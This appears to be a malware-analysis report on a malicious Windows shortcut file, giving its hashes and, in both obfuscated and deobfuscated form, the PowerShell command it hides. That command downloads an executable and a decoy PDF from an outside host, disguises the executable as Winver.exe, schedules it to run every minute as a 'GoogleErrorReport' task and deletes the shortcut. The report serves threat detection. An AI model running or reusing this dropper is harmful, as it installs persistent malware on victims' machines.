8930abf86e2e94b1a4b373e25d01f2ff
LNK File | MD5: 8930abf86e2e94b1a4b373e25d01f2ff | Size: 2.55 KB | application/x-ms-shortcut
Hash | Hash Value |
---|---|
MD5 | 8930abf86e2e94b1a4b373e25d01f2ff |
Sha1 | 3a83ba1264291493a8fa39b4d343c0e1ee271974 |
Sha256 | 4466995be863ec4405fc053296cfe74d0098f94e61aa89c95fa2cc80c8ad6cb9 |
Sha384 | f94877f5797b14efc11614c949a28e39ea8b22f34cd21e8101d3999ba2b29664757075ba6dfb35861749470b2dccfb58 |
Sha512 | ebe5c0d7152ce8ed35e6a71c6436c0a1fbb929def0c417334136f69f86b1dfce002e906f7fce5e92e6ad9bc85fbde5a919c29600def19ec35f7980876ccb2faa |
SSDeep | 48:8jBhv72LXXOrcOqhaMmOqhukesqAqL5dqoB6rHXv3QiYcs6N0:8jBdSLXOgdaMmdGcEQv9YbM |
TLSH | 4151CE182AE11624F3F24B7954BB55C08D3ABD5EFE318E9C4291D54C0861A1AFC72F2F |
Name0 | Value |
---|---|
LNK: Command Execution | conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n? |
Deobfuscated PowerShell | $ProgressPreference = "SilentlyContinue" $b = "C:\Users" Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf saps $b\Public\89565254.pdf Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip" ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe" cpi "$b\Public\89565254.pdf" -destination "." schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f" Remove-Item "*d?.?n?" |
Name0 | Value | Location |
---|---|---|
LNK: Command Execution | conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n? Malicious |
8930abf86e2e94b1a4b373e25d01f2ff |
Deobfuscated PowerShell | $ProgressPreference = "SilentlyContinue" $b = "C:\Users" Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf saps $b\Public\89565254.pdf Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip" ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe" cpi "$b\Public\89565254.pdf" -destination "." schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f" Remove-Item "*d?.?n?" Malicious |
8930abf86e2e94b1a4b373e25d01f2ff > LNK CommandLine > [PowerShell Command] |